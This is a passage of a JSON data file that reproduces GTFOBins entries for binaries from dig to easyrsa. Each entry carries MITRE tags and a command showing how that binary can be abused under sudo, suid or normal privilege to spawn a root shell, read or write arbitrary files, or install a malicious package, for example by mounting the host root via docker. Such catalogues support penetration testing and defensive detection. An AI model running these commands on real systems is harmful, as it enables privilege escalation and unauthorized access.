operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:dig:file-read:0:unprivileged","toolId":"gtfo:dig","toolName":"dig","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dig -f /path/to/input-file","description":"Each input line is treated as a lookup query for the `dig` command and the output is corrupted with the result or errors of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dig/"]},{"id":"gtfo:distcc:shell:0:sudo","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:distcc:shell:0:suid","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"distcc /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:distcc:shell:0:unprivileged","toolId":"gtfo:distcc","toolName":"distcc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"distcc /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/distcc/"]},{"id":"gtfo:dmesg:file-read:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:file-read:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:file-read:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dmesg -rF /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:sudo","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:suid","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmesg:inherit:0:unprivileged","toolId":"gtfo:dmesg","toolName":"dmesg","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dmesg -H","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmesg/"]},{"id":"gtfo:dmidecode:file-write:0:unprivileged","toolId":"gtfo:dmidecode","toolName":"dmidecode","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dmidecode --no-sysfs -d x.dmi --dump-bin /path/to/output-file","description":"It can be used to write files using a specially crafted SMBIOS file that can be read as a memory device by dmidecode.\nGenerate the file with [dmiwrite](https://github.com/adamreiser/dmiwrite) and upload it to the target.\n\n- `--dump-bin`, will cause dmidecode to write the payload to the destination specified, prepended with 32 null bytes.\n\n- `--no-sysfs`, if the target system is using an older version of dmidecode, you may need to omit the option.\n\n```\nmake dmiwrite\necho DATA >/path/to/temp-file\n./dmiwrite /path/to/temp-file x.dmi\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmidecode/"]},{"id":"gtfo:dmsetup:shell:0:sudo","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dmsetup:shell:0:suid","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dmsetup:shell:0:unprivileged","toolId":"gtfo:dmsetup","toolName":"dmsetup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\ndmsetup ls --exec '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dmsetup/"]},{"id":"gtfo:dnf:command:0:sudo","toolId":"gtfo:dnf","toolName":"dnf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnf install -y x-1.0-1.noarch.rpm --disablerepo=*","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```\n\nThe `--disablerepo=*` option is used for targets without Internet connectivity, can be omitted otherwise.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnf/"]},{"id":"gtfo:dnsmasq:command:0:sudo","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:dnsmasq:command:0:suid","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:dnsmasq:command:0:unprivileged","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:doas:shell:0:sudo","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/doas/"]},{"id":"gtfo:doas:shell:0:unprivileged","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/doas/"]},{"id":"gtfo:docker:file-read:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-read:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-read:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:dos2unix:file-read:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-read:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-read:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dosbox:file-read:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dotnet:file-read:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:file-read:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:shell:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:shell:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dpkg:inherit:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:inherit:0:suid","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:inherit:0:unprivileged","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:shell:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dpkg -i x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dstat:inherit:0:sudo","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dstat/"]},{"id":"gtfo:dstat:inherit:0:unprivileged","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dstat/"]},{"id":"gtfo:dvips:shell:0:sudo","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:dvips:shell:0:suid","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:dvips:shell:0:unprivileged","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:easy_install:inherit:0:sudo","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easy_install/"]},{"id":"gtfo:easy_install:inherit:0:unprivileged","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easy_install/"]},{"id":"gtfo:easyrsa:shell:0:sudo","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in 